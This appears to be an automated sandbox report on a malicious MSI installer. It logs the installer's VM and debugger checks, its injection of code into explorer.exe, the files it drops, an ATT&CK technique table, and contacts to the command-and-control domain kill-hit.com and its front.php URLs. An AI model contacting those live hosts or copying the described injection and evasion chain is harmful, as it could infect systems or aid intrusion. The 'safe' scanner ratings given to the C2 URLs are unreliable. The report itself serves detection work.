Source: classes.jsa.2.drBinary or memory string: VirtualMachineError.java
Source: K064a7Rfk7.msiBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: explorer.exe, 0000000B.00000002.2323519946.0000000000788000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323519946.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: classes.jsa.2.drBinary or memory string: jdk/vm/ci/common/JVMCIError
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.services.JVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.hotspot.aarch64.AArch64HotSpotJVMCIBackendFactory
Source: avcodec-60.dll.2.drBinary or memory string: vmncVMware Screen Codec / VMware Video @
Source: classes.jsa.2.drBinary or memory string: &jdk.vm.ci.services.JVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: ()Ljdk/vm/ci/runtime/JVMCIRuntime;
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2315188964.000001D153220000.00000004.00001000.00020000.00000000.sdmp, obs-ffmpeg-mux.exe, 00000007.00000002.2315129206.000001D153170000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |vbOXmINIrDRdn ||
Source: classes.jsa.2.drBinary or memory string: java/lang/VirtualMachineError.class
Source: classes.jsa.2.drBinary or memory string: 7jdk.vm.ci.hotspot.amd64.AMD64HotSpotJVMCIBackendFactory
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2315188964.000001D153220000.00000004.00001000.00020000.00000000.sdmp, obs-ffmpeg-mux.exe, 00000007.00000002.2315129206.000001D153170000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |vbOXtRAYipc ||
Source: classes.jsa.2.drBinary or memory string: <"()Ljdk/vm/ci/runtime/JVMCIRuntime;
Source: classes.jsa.2.drBinary or memory string: java/lang/VirtualMachineError
Source: classes.jsa.2.drBinary or memory string: org.graalvm.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: %jdk/vm/ci/hotspot/HotSpotJVMCIRuntime
Source: UnRar.exe, 00000005.00000003.2301496595.000001966AD82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7KqemUeu
Source: classes.jsa.2.drBinary or memory string: jdk/vm/ci/hotspot/HotSpotJVMCIRuntime
Source: classes.jsa.2.drBinary or memory string: ;jdk.vm.ci.hotspot.aarch64.AArch64HotSpotJVMCIBackendFactory
Source: classes.jsa.2.drBinary or memory string: jdk/vm/ci/runtime/JVMCI
Source: classes.jsa.2.drBinary or memory string: )()Ljdk/vm/ci/hotspot/HotSpotJVMCIRuntime;
Source: classes.jsa.2.drBinary or memory string: UG#java/lang/VirtualMachineError.class
Source: classes.jsa.2.drBinary or memory string: #()Ljdk/vm/ci/runtime/JVMCICompiler;
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.hotspot.amd64.AMD64HotSpotJVMCIBackendFactory
Source: classes.jsa.2.drBinary or memory string: <org.graalvm.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: Ljava/lang/VirtualMachineError;
Source: avcodec-60.dll.2.drBinary or memory string: VMware Screen Codec / VMware Video
Source: classes.jsa.2.drBinary or memory string: ()Ljdk/vm/ci/hotspot/HotSpotJVMCIRuntime;
Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D90 Start: 00007FFD9370300F End: 00007FFD93702E857_2_00007FFD93702D90
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D90 rdtsc 7_2_00007FFD93702D90
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF1D78 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7AACF1D78
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EED32 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,7_2_00007FFD936EED32
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C049A0 mov ecx, dword ptr fs:[00000030h]11_2_00C049A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AAD00C90 GetProcessHeap,5_2_00007FF7AAD00C90
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF1F20 SetUnhandledExceptionFilter,5_2_00007FF7AACF1F20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF110C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7AACF110C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF61D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7AACF61D8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E743E04 SetUnhandledExceptionFilter,7_2_00007FF71E743E04
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E743C5C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF71E743C5C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E743774 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF71E743774
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38267D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFDA38267D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3818848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FFDA3818848
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3818594 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFDA3818594
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeCode function: 8_2_00007FF7C76D3074 SetUnhandledExceptionFilter,8_2_00007FF7C76D3074
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeCode function: 8_2_00007FF7C76D2ECC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7C76D2ECC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeCode function: 8_2_00007FF7C76D2984 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7C76D2984
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C08864 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00C08864
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0C95A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00C0C95A
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C084B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00C084B1
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C08641 SetUnhandledExceptionFilter,11_2_00C08641

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.37.86 80Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: C00000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeNtUnmapViewOfSection: Indirect: 0x1D153140E1BJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeNtQueryInformationProcess: Indirect: 0x1D153140CB3Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeNtResumeThread: Indirect: 0x1D15314144EJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C00000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory written: PID: 524 base: C00000 value: 4DJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: C00000Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C00000Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE2350 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00007FF7AACE2350
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE22D8 cpuid 5_2_00007FF7AACE22D8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: SetThreadErrorMode,SetEventWhenCallbackReturns,AddDllDirectory,FindVolumeClose,GetOEMCP,ClearCommError,WriteProfileStringW,CreatePrivateNamespaceW,DeleteAtom,GetNumaNodeProcessorMask,GetCommConfig,SearchPathW,SetFileCompletionNotificationModes,BackupRead,GetTimeZoneInformation,GetMetaFileW,GetPrivateProfileSectionW,GetMaximumProcessorCount,SignalObjectAndWait,GetThreadIdealProcessorEx,DeleteTimerQueueEx,GetTextExtentPointI,LockResource,FindNextVolumeW,GlobalReAlloc,GlobalAlloc,ExtSelectClipRgn,GetEnhMetaFilePaletteEntries,DeleteTimerQueue,ChangeTimerQueueTimer,VerifyScripts,ClosePrivateNamespace,GetSystemPowerStatus,GetModuleHandleW,IsBadStringPtrW,GetNearestPaletteIndex,SetSearchPathMode,ReadConsoleOutputCharacterW,SetCalendarInfoW,LocaleNameToLCID,InitializeConditionVariable,GetWinMetaFileBits,GetLocaleInfoW,FindNextVolumeMountPointW,EnumTimeFormatsEx,SetFileTime,GetTimeFormatW,GetCharABCWidthsFloatW,LeaveCriticalSectionWhenCallbackReturns,WaitForThreadpoolWorkCallbacks,7_2_00007FFDA378C6E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: FreeDDElParam,OpenSemaphoreW,GetThreadGroupAffinity,GetVolumeNameForVolumeMountPointW,FrameRect,WaitForMultipleObjectsEx,GetSystemTimes,WideCharToMultiByte,VirtualProtect,GetTempPathW,GetNamedPipeClientSessionId,SystemTimeToTzSpecificLocalTimeEx,GetProcessHandleCount,SetThreadStackGuarantee,LocalFlags,GetFileMUIInfo,SystemTimeToFileTime,LocalHandle,SetProcessPriorityBoost,EnumResourceTypesExW,TzSpecificLocalTimeToSystemTimeEx,GetLocaleInfoW,SetConsoleActiveScreenBuffer,WaitForDebugEvent,GetConsoleTitleW,GetThreadTimes,GetNamedPipeHandleStateW,InitializeConditionVariable,SetConsoleActiveScreenBuffer,VirtualProtect,GlobalFree,GetConsoleTitleW,VerSetConditionMask,GetCPInfo,FreeLibrary,SetCurrentConsoleFontEx,SetThreadDescription,GetUserDefaultLCID,SetLocalTime,HeapQueryInformation,FlsAlloc,GetLastError,GetThreadErrorMode,WaitForThreadpoolWaitCallbacks,GetDiskFreeSpaceExW,GlobalMemoryStatus,WriteProfileSectionW,AddIntegrityLabelToBoundaryDescriptor,CancelSynchronousIo,GetDriveTypeW,7_2_00007FFDA37890E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: EnumSystemLocalesW,7_2_00007FFDA382F94C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: GetLocaleInfoW,7_2_00007FFDA382FDCC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,7_2_00007FFDA383818C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00007FFDA3838650
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: EnumSystemLocalesW,7_2_00007FFDA38385B8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: EnumSystemLocalesW,7_2_00007FFDA38384E8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00007FFDA3838BD4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: GetLocaleInfoW,7_2_00007FFDA3838AA0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_00007FFDA38389F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: GetLocaleInfoW,7_2_00007FFDA3838898
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACF1F8C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FF7AACF1F8C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe Code function: 7_2_00007FFD93779720 GetTimeZoneInformation,GetSystemTimeAsFileTime,7_2_00007FFD93779720
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe Code function: 5_2_00007FF7AACDAFB4 RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetVersionExW,LoadLibraryExW,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACDAFB4
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 14 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Windows Service | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Clipboard Data | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 3 Command and Scripting Interpreter | Logon Script (Windows) | 1 Access Token Manipulation | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Windows Service | 3 Obfuscated Files or Information | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 611 Process Injection | 1 Timestomp | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Masquerading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 611 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
Behavior Graph (ID: 1591347, Sample: K064a7Rfk7.msi, Startdate: 14/01/2025, Architecture: WINDOWS, Score: 92)

K064a7Rfk7.msi
  DNS/IP: kill-hit.com
  Signatures: Multi AV Scanner detection for dropped file; AI detected suspicious sample; Potentially malicious time measurement code found
  started: msiexec.exe
    dropped: C:\Windows\Installer\MSIE336.tmp, PE32
    dropped: C:\Windows\Installer\MSIE289.tmp, PE32
    dropped: C:\Windows\Installer\MSIE249.tmp, PE32
    dropped: 49 other files (10 malicious)
    started: obs-ffmpeg-mux.exe
      Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
      started: explorer.exe
        DNS/IP: kill-hit.com, 104.21.37.86, 49779, 80, CLOUDFLARENETUS, United States
        Signatures: System process connects to network (likely due to code injection or exploit)
      started: conhost.exe
      started: WerFault.exe
    started: msiexec.exe
      Signatures: Query firmware table information (likely to detect VMs)
    started: UnRar.exe
      dropped: C:\Users\user\AppData\Roaming\...\obs.dll, PE32+
      started: conhost.exe
    started: createdump.exe
      started: conhost.exe
  started: msiexec.exe

| Source | Detection | Scanner | Label |
|---|---|---|---|
| K064a7Rfk7.msi | 5% | Virustotal | |
| K064a7Rfk7.msi | 5% | ReversingLabs | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avcodec-60.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avformat-60.dll | 3% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avutil-58.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dll | 24% | ReversingLabs | Win64.Trojan.Generic |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swresample-4.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\w32-pthreads.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dll | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE0DE.tmp | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE18B.tmp | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE1CA.tmp | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE1FA.tmp | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE249.tmp | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE289.tmp | 0% | ReversingLabs | |
| C:\Windows\Installer\MSIE336.tmp | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0S | 0% | Avira URL Cloud | safe |
| http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0 | 0% | Avira URL Cloud | safe |
| http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=02Z | 0% | Avira URL Cloud | safe |
| http://kill-hit.com/Y | 0% | Avira URL Cloud | safe |
| https://java.oracle.com/ | 0% | Avira URL Cloud | safe |
| http://kill-hit.com:80/front.php?a=yrJh28ExgsVYO0Y&id=0 | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| kill-hit.com | 104.21.37.86 | true | true | | unknown |
